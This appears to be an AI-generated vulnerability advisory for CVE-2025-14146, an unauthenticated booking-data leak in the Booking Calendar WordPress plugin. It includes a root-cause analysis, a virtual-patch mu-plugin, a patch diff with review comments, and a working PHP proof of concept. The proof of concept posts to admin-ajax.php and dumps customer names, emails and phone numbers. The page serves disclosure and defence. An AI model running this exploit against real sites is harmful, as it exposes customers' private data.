Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14146: Booking Calendar <= 10.14.10 – Unauthenticated Sensitive Information Exposure (booking)

Plugin: booking
Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 10.14.10
Patched Version: 10.14.11
Disclosed: January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14146:
This vulnerability is an unauthenticated sensitive information exposure in the Booking Calendar WordPress plugin. The flaw resides in the timeline view component and allows attackers to extract detailed booking records. The CVSS score of 5.3 reflects a moderate severity impact on confidentiality.

Atomic Edge research identifies the root cause as an insufficient authorization check in the `WPBC_FLEXTIMELINE_NAV` AJAX action handler. The file `booking/core/timeline/v2/wpbc-class-timeline_v2.php` contains the vulnerable logic. At lines 3333-3348, the code conditionally enables a popover feature showing booking details based on the `booking_is_show_popover_in_timeline_front_end` option. The default `booking_is_nonce_at_front_end` setting is ‘Off’, which disables nonce verification for front-end AJAX requests. The original patch in version 10.14.10.1 added a check for `get_current_user_id()`, but this check was placed inside an `else` block that only executed if the `booking_is_show_popover_in_timeline_front_end` option was ‘On’. This created a logic flaw where unauthenticated users could still trigger the data exposure if the option was enabled.

Exploitation requires an attacker to send a crafted POST request to the WordPress `/wp-admin/admin-ajax.php` endpoint. The request must set the `action` parameter to `WPBC_FLEXTIMELINE_NAV`. No authentication or nonce is required due to the default plugin configuration. The attacker can include parameters like `view_days_num` and `scroll_start_date` to navigate the timeline and retrieve booking data. The server response will contain sensitive customer information, including names, email addresses, phone numbers, and booking details, in JSON format.

The patch in version 10.14.11.1 introduces a new global constant, `WPBC_DISABLE_POPOVER_IN_TIMELINE`, defined as `true` in `booking/wpdev-booking.php` at line 86. The logic in `wpbc-class-timeline_v2.php` is restructured. A new conditional at line 3335 checks this constant first. If it is true, the `$is_show_popover_in_timeline` variable is immediately set to `false`, bypassing all subsequent option checks. This change completely disables the popover feature on the front-end timeline, eliminating the data exposure vector regardless of plugin settings or user authentication state.

Successful exploitation leads to the exposure of all booking data accessible via the front-end timeline view. Attackers can harvest personally identifiable information (PII) such as customer names, email addresses, and phone numbers. They can also obtain booking details, which may include dates, times, services booked, and custom form field submissions. This data breach violates user privacy and could facilitate phishing campaigns, spam, or further targeted attacks.
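As a stop-gap for sites that cannot update to 10.14.11 immediately, the following must-use plugin (added here as an illustration; it is not Booking Calendar code and not part of the Atomic Edge write-up) refuses the `WPBC_FLEXTIMELINE_NAV` AJAX action to visitors who are not logged in and records the attempt. It assumes a standard WordPress install, where admin-ajax.php fires `admin_init` before dispatching `wp_ajax_nopriv_*` handlers; the file name, function names and log format are mine.

```php
<?php
/**
 * Plugin Name: Block unauthenticated WPBC_FLEXTIMELINE_NAV (virtual patch for CVE-2025-14146)
 * Description: Drop into wp-content/mu-plugins/. Illustrative hardening, not Booking Calendar code.
 */

// The AJAX action named in the advisory, kept in one place so it is easy to audit.
const WPBC_VPATCH_BLOCKED_ACTIONS = array( 'WPBC_FLEXTIMELINE_NAV' );

/**
 * Decide whether a request should be refused.
 * Pure function so the rule can be unit-tested without loading WordPress.
 *
 * @param string|null $action    Value of the `action` request parameter.
 * @param bool        $is_ajax   Whether this is an admin-ajax.php request.
 * @param bool        $logged_in Whether WordPress resolved an authenticated user.
 * @return bool
 */
function wpbc_vpatch_should_block( $action, $is_ajax, $logged_in ) {
	return $is_ajax
		&& ! $logged_in
		&& is_string( $action )
		&& in_array( $action, WPBC_VPATCH_BLOCKED_ACTIONS, true );
}

// admin_init runs in admin-ajax.php before any wp_ajax_nopriv_* handler is dispatched,
// so refusing here means the plugin's handler never builds the timeline at all.
add_action( 'admin_init', function () {
	$action = isset( $_REQUEST['action'] ) ? wp_unslash( $_REQUEST['action'] ) : null;

	if ( ! wpbc_vpatch_should_block( $action, wp_doing_ajax(), is_user_logged_in() ) ) {
		return;
	}

	// Audit trail for the SOC. REMOTE_ADDR is the address as seen by PHP;
	// adjust if the site sits behind a reverse proxy or CDN.
	error_log( sprintf(
		'[wpbc-vpatch] blocked unauthenticated %s from %s',
		$action,
		isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown'
	) );

	// 403 with a JSON body, matching what admin-ajax.php clients expect.
	wp_send_json_error( array( 'message' => 'Authentication required.' ), 403 );
}, 0 );
```

Logged-in users still fall through to the plugin's own option and role checks, so legitimate back-end use is unaffected. Remove the file once the site runs 10.14.11 or later.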

Differential between vulnerable and patched code

Code Diff
--- a/booking/core/timeline/v2/wpbc-class-timeline_v2.php
+++ b/booking/core/timeline/v2/wpbc-class-timeline_v2.php
@@ -3330,21 +3330,27 @@

 	// For client Timeline.
 	if ( $is_frontend ) {
-		$is_show_popover_in_timeline = ( get_bk_option( 'booking_is_show_popover_in_timeline_front_end' ) == 'On' ) ? true : false;
-		if ( ! class_exists( 'wpdev_bk_personal' ) ) {
-			$is_show_popover_in_timeline = false;    // FixIn: 10.14.9.2.
-		}
-		// FixIn: 10.14.10.1.
-		if ( 0 === get_current_user_id() ) {
-			// User  is not logged in.
+
+		// FixIn: 10.14.11.1.
+		if ( WPBC_DISABLE_POPOVER_IN_TIMELINE ) {
 			$is_show_popover_in_timeline = false;
 		} else {
-			// 'subscriber' > 'contributor' > 'author' > 'editor' > 'administrator'.
-			$minimum_user_role = get_bk_option( 'booking_min_user_role_for_popover_in_timeline' );
-			$minimum_user_role = ( ! empty( $minimum_user_role ) ) ? $minimum_user_role : 'administrator';
-			if ( ! wpbc_is_current_user_have_this_role( $minimum_user_role ) ) {
-				// User  has lower role, than  checked.
+			$is_show_popover_in_timeline = ( get_bk_option( 'booking_is_show_popover_in_timeline_front_end' ) == 'On' ) ? true : false;
+			if ( ! class_exists( 'wpdev_bk_personal' ) ) {
+				$is_show_popover_in_timeline = false;    // FixIn: 10.14.9.2.
+			}
+			// FixIn: 10.14.10.1.
+			if ( 0 === get_current_user_id() ) {
+				// User  is not logged in.
 				$is_show_popover_in_timeline = false;
+			} else {
+				// 'subscriber' > 'contributor' > 'author' > 'editor' > 'administrator'.
+				$minimum_user_role = get_bk_option( 'booking_min_user_role_for_popover_in_timeline' );
+				$minimum_user_role = ( ! empty( $minimum_user_role ) ) ? $minimum_user_role : 'administrator';
+				if ( ! wpbc_is_current_user_have_this_role( $minimum_user_role ) ) {
+					// User  has lower role, than  checked.
+					$is_show_popover_in_timeline = false;
+				}
 			}
 		}
 	}
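Review bot: the new `WPBC_DISABLE_POPOVER_IN_TIMELINE` guard only decides whether the popover is rendered; nothing in this hunk adds an authorization or nonce check to the `WPBC_FLEXTIMELINE_NAV` handler itself, so the fix is a kill switch at the presentation layer while the previous `else` branch (option check, `get_current_user_id()`, role check) is kept verbatim as dead-by-default code. Since the constant is declared behind a `! defined()` guard in `wpdev-booking.php`, a site that defines it as `false` in `wp-config.php` re-enters that branch unchanged; either document that override as unsupported for the front end or make the `else` branch also require a valid nonce before it can set `$is_show_popover_in_timeline` to `true`. Minor: `( get_bk_option( ... ) == 'On' ) ? true : false` is a loose comparison wrapped in a redundant ternary; `'On' === get_bk_option( ... )` is sufficient.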
--- a/booking/wpdev-booking.php
+++ b/booking/wpdev-booking.php
@@ -7,7 +7,7 @@
 Author URI: https://wpbookingcalendar.com/
 Text Domain: booking
 Domain Path: /languages/
-Version: 10.14.10
+Version: 10.14.11
 License: GPLv2 or later
 */

@@ -34,7 +34,7 @@


 if ( ! defined( 'WP_BK_VERSION_NUM' ) ) {
-	define( 'WP_BK_VERSION_NUM', '10.14.10' );
+	define( 'WP_BK_VERSION_NUM', '10.14.11' );
 }
 if ( ! defined( 'WP_BK_MINOR_UPDATE' ) ) {
 	define( 'WP_BK_MINOR_UPDATE',  true );
@@ -83,6 +83,11 @@
 	define( 'WPBC_IS_PLAYGROUND', ( isset( $_SERVER['SERVER_SOFTWARE'] ) && ( 'PHP.wasm' === $_SERVER['SERVER_SOFTWARE'] ) ) );
 }

+// Intentionally completely disable showing booking deatils in Timeline view on Front-End side.							// FixIn: 10.14.11.1.
+if ( ! defined( 'WPBC_DISABLE_POPOVER_IN_TIMELINE' ) ) {
+	define( 'WPBC_DISABLE_POPOVER_IN_TIMELINE', true );
+}
+
 // ---------------------------------------------------------------------------------------------------------------------
 // ==  DEBUG  CONSTANTS  ==
 // ---------------------------------------------------------------------------------------------------------------------
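Review bot: the `! defined()` guard on `WPBC_DISABLE_POPOVER_IN_TIMELINE` makes this a site-overridable setting rather than the hard removal the comment describes ("Intentionally completely disable"); if the override is meant to be supported, say so in the comment and the readme, otherwise use an unconditional `define()`. Also fix "deatils" to "details" in the comment.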

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14146 - Booking Calendar <= 10.14.10 - Unauthenticated Sensitive Information Exposure

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// The vulnerable AJAX action
$post_data = array(
    'action' => 'WPBC_FLEXTIMELINE_NAV',
    // Additional parameters to navigate the timeline. Adjust as needed.
    'view_days_num' => '30',
    'scroll_start_date' => date('Y-m-d'),
    'wh_booking_type' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // For testing only

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 && !empty($response)) {
    $json_response = json_decode($response, true);
    if (json_last_error() === JSON_ERROR_NONE) {
        echo "[+] Request successful.\n";
        echo "[+] Response contains booking data.\n";
        // Print a sample of the data structure
        print_r($json_response);
    } else {
        echo "[+] Received non-JSON response (may indicate error or patched site).\n";
        echo "Response: " . htmlspecialchars($response) . "\n";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_code\n";
}
